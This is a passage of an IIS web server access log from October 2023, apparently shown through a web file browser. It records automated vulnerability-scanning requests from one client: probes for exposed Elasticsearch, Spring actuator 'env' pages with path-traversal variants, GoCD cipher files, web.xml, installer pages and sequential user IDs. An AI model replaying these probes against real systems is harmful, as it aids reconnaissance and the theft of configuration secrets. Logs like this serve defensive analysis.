????
Current Path : C:/inetpub/logs/LogFiles/W3SVC18/ |
Current File : C:/inetpub/logs/LogFiles/W3SVC18/u_ex231015.log |
#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-10-15 00:01:17 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-10-15 00:01:17 103.153.214.94 GET /client/index.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 207 2023-10-15 00:01:26 103.153.214.94 GET /NON_EXISTING_PATH/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 204 2023-10-15 00:01:40 103.153.214.94 GET /cgi-bin/ExportSettings.sh - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 201 2023-10-15 00:01:44 103.153.214.94 GET /v2/_catalog - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 203 2023-10-15 00:03:50 103.153.214.94 GET /druid/index.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 203 2023-10-15 00:07:58 103.153.214.94 GET /v2/auth/roles - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 204 2023-10-15 00:08:04 103.153.214.94 GET /jquery-file-upload/server/php/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 201 2023-10-15 00:08:20 103.153.214.94 GET / pretty 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 206 2023-10-15 00:08:22 103.153.214.94 GET /_cat/indices v 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 201 2023-10-15 00:08:24 103.153.214.94 GET /_all/_search - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 200 2023-10-15 00:08:26 103.153.214.94 GET /_cluster/health pretty 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 205 2023-10-15 00:08:47 103.153.214.94 GET / SPX_KEY=dev&SPX_UI_URI=/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 207 2023-10-15 00:08:49 103.153.214.94 GET / SPX_KEY=devel&SPX_UI_URI=/ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 202 2023-10-15 00:08:51 103.153.214.94 GET / SPX_KEY=stg&SPX_UI_URI=/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 207 2023-10-15 00:08:51 103.153.214.94 GET / SPX_KEY=stag&SPX_UI_URI=/ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 201 2023-10-15 00:08:54 103.153.214.94 GET / SPX_KEY=staging&SPX_UI_URI=/ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 205 2023-10-15 00:08:56 103.153.214.94 GET / SPX_KEY=prd&SPX_UI_URI=/ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 201 2023-10-15 00:08:58 103.153.214.94 GET / SPX_KEY=prod&SPX_UI_URI=/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 201 2023-10-15 00:09:00 103.153.214.94 GET / SPX_KEY=production&SPX_UI_URI=/ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 200 2023-10-15 00:09:02 103.153.214.94 GET / SPX_KEY=test&SPX_UI_URI=/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 206 2023-10-15 00:09:04 103.153.214.94 GET / SPX_KEY=testing&SPX_UI_URI=/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 204 2023-10-15 00:09:06 103.153.214.94 GET / SPX_KEY=spx&SPX_UI_URI=/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 202 2023-10-15 00:15:28 103.153.214.94 GET /2WfF0d3KTc6EHWxmZRY08L9Jaau - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 205 2023-10-15 00:15:51 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 208 2023-10-15 00:15:53 103.153.214.94 GET /app/kibana - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 201 2023-10-15 00:15:55 103.153.214.94 GET /app/kibana/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 201 2023-10-15 00:16:33 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 205 2023-10-15 00:16:35 103.153.214.94 GET /sqlite/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201 2023-10-15 00:16:37 103.153.214.94 GET /sqlitemanager/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 201 2023-10-15 00:17:45 103.153.214.94 GET /request_para.cgi parameter=wifi_get_5g_host 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 204 2023-10-15 00:20:02 103.153.214.94 GET /install/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 201 2023-10-15 00:20:06 103.153.214.94 GET /api/presets/ filter=true 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 0 2 213 2023-10-15 00:20:52 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 212 2023-10-15 00:20:54 103.153.214.94 GET /ganglia/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 201 2023-10-15 00:21:17 103.153.214.94 GET /user/sign_up - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 201 2023-10-15 00:27:18 103.153.214.94 GET /users/sign_in - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 205 2023-10-15 00:28:01 103.153.214.94 GET /glpi/files/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 205 2023-10-15 00:28:03 103.153.214.94 GET /glpi/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 200 2023-10-15 00:33:25 103.153.214.94 GET /go/add-on/business-continuity/api/cruise_config - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 208 2023-10-15 00:34:50 103.153.214.94 GET /go/add-on/business-continuity/api/cipher.aes - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 204 2023-10-15 00:35:01 103.153.214.94 GET /go/admin/pipelines/create group=defaultGroup 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 202 2023-10-15 00:37:33 103.153.214.94 PUT /2WfF0fbRJ4IYjNev9Hnphfu8z3W.json - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 205 2023-10-15 00:37:35 103.153.214.94 GET /2WfF0fbRJ4IYjNev9Hnphfu8z3W.json - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 202 2023-10-15 00:39:08 103.153.214.94 POST /api/user/signup/step2 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 228 2023-10-15 00:40:09 103.153.214.94 GET /admin - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 301 0 0 860 2023-10-15 00:40:27 103.153.214.94 POST /ws/v1/cluster/apps/new-application - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 201 2023-10-15 00:47:30 103.153.214.94 GET /haproxy-status - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 204 2023-10-15 00:47:32 103.153.214.94 GET /haproxy stats 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 202 2023-10-15 00:52:07 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 208 2023-10-15 00:53:40 103.153.214.94 GET /monitoring - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 207 2023-10-15 00:56:40 103.153.214.94 GET /artemis/env - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 208 2023-10-15 00:56:42 103.153.214.94 GET /artemis-portal/artemis/env - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 201 2023-10-15 00:56:44 103.153.214.94 GET /artemis/actuator/env - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 200 2023-10-15 00:56:46 103.153.214.94 GET /artemis;/env; - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 199 2023-10-15 00:56:48 103.153.214.94 GET /artemis/1/..;/env - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 201 2023-10-15 00:58:09 103.153.214.94 GET /SSI/Auth/ip_snmp.htm - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 204 2023-10-15 00:59:20 103.153.214.94 GET /chpstrt.php chppath=Home 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 207 2023-10-15 00:59:59 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 207 2023-10-15 01:00:02 103.153.214.94 GET /hp/device/webAccess/index.htm content=security 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 200 2023-10-15 01:03:57 103.153.214.94 GET /wps/portal/client/welcome/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/ uri=nm:oid:Z6_00000000000000A0BR2B300GG2 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 207 2023-10-15 01:03:59 103.153.214.94 GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/ uri=nm:oid:Z6_00000000000000A0BR2B300GG2 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 202 2023-10-15 01:04:01 103.153.214.94 GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBQfxRYSYCHh5mHoYWBj7-RL1DC1y3M2NXCx9jA3RiqAI8ZBbmhEQaZjooABQv7ag!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 203 2023-10-15 01:04:04 103.153.214.94 GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBAf0FuaCgAb7VcBA!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 203 2023-10-15 01:04:06 103.153.214.94 GET /wps/portal/!ut/p/z1/pZHBDoIwDIYfqZVF4DoIEg5KBEHWi9mBIAnbjCEefHqH8SARJNGe2qRf_78tEFRAWt7aRvat0bKztSD3hKPgGGROwBDjEuH4bOBxWewx9NzUOzBMki3mWRSs_M0a6IN_n_Ti5wRiZ4Kf0J9r8PEXfmTwL_0Sl_YXlvfm-CRFKLS5KvuJHAgoDXeL9wKSBkR_VkPa6QZEra1N-rrJcKglqxdV2KjuEVM-czP-AKyJL-g!/dz/d5/L2dBISEvZ0FBIS9nQSEh/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 208 2023-10-15 01:04:48 103.153.214.94 GET /iojs/WEB-INF/web.xml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 207 2023-10-15 01:09:04 103.153.214.94 GET /install.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 207 2023-10-15 01:12:30 103.153.214.94 GET /installer - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 207 2023-10-15 01:13:04 103.153.214.94 GET /index.php/install - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 203 2023-10-15 01:13:20 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 204 2023-10-15 01:13:23 103.153.214.94 GET / page=step_1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 589 2023-10-15 01:14:03 103.153.214.94 GET /html/setup.html - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 201 2023-10-15 01:14:57 103.153.214.94 GET /setup/wizard.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 203 2023-10-15 01:14:59 103.153.214.94 GET /itop/setup/wizard.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 200 2023-10-15 01:16:43 103.153.214.94 GET /install - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 203 2023-10-15 01:17:47 103.153.214.94 GET /finish-installation/register - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 208 2023-10-15 01:22:27 103.153.214.94 GET /ESPEasy - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 206 2023-10-15 01:23:24 103.153.214.94 GET /install/ step=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 208 2023-10-15 01:23:43 103.153.214.94 GET /admin/install.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 301 0 0 204 2023-10-15 01:24:33 103.153.214.94 GET /settings - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 204 2023-10-15 01:29:50 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 214 2023-10-15 01:29:51 103.153.214.94 GET /secure/SetupMode!default.jspa - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 202 2023-10-15 01:32:24 103.153.214.94 GET /installation/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 203 2023-10-15 01:32:49 103.153.214.94 GET /index.php r=installer/welcome 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 204 2023-10-15 01:32:56 103.153.214.94 GET /index.php/install/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200 2023-10-15 01:33:40 103.153.214.94 GET /api/v4/users/1 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 227 2023-10-15 01:33:40 103.153.214.94 GET /api/v4/users/2 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 211 2023-10-15 01:33:43 103.153.214.94 GET /api/v4/users/3 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:33:44 103.153.214.94 GET /api/v4/users/4 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:33:47 103.153.214.94 GET /api/v4/users/5 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 445 2023-10-15 01:33:48 103.153.214.94 GET /api/v4/users/6 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 211 2023-10-15 01:33:48 103.153.214.94 GET /api/v4/users/7 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:33:51 103.153.214.94 GET /api/v4/users/8 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 204 2023-10-15 01:33:52 103.153.214.94 GET /api/v4/users/9 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 206 2023-10-15 01:33:53 103.153.214.94 GET /api/v4/users/10 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 204 2023-10-15 01:33:53 103.153.214.94 GET /api/v4/users/11 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 205 2023-10-15 01:33:55 103.153.214.94 GET /api/v4/users/12 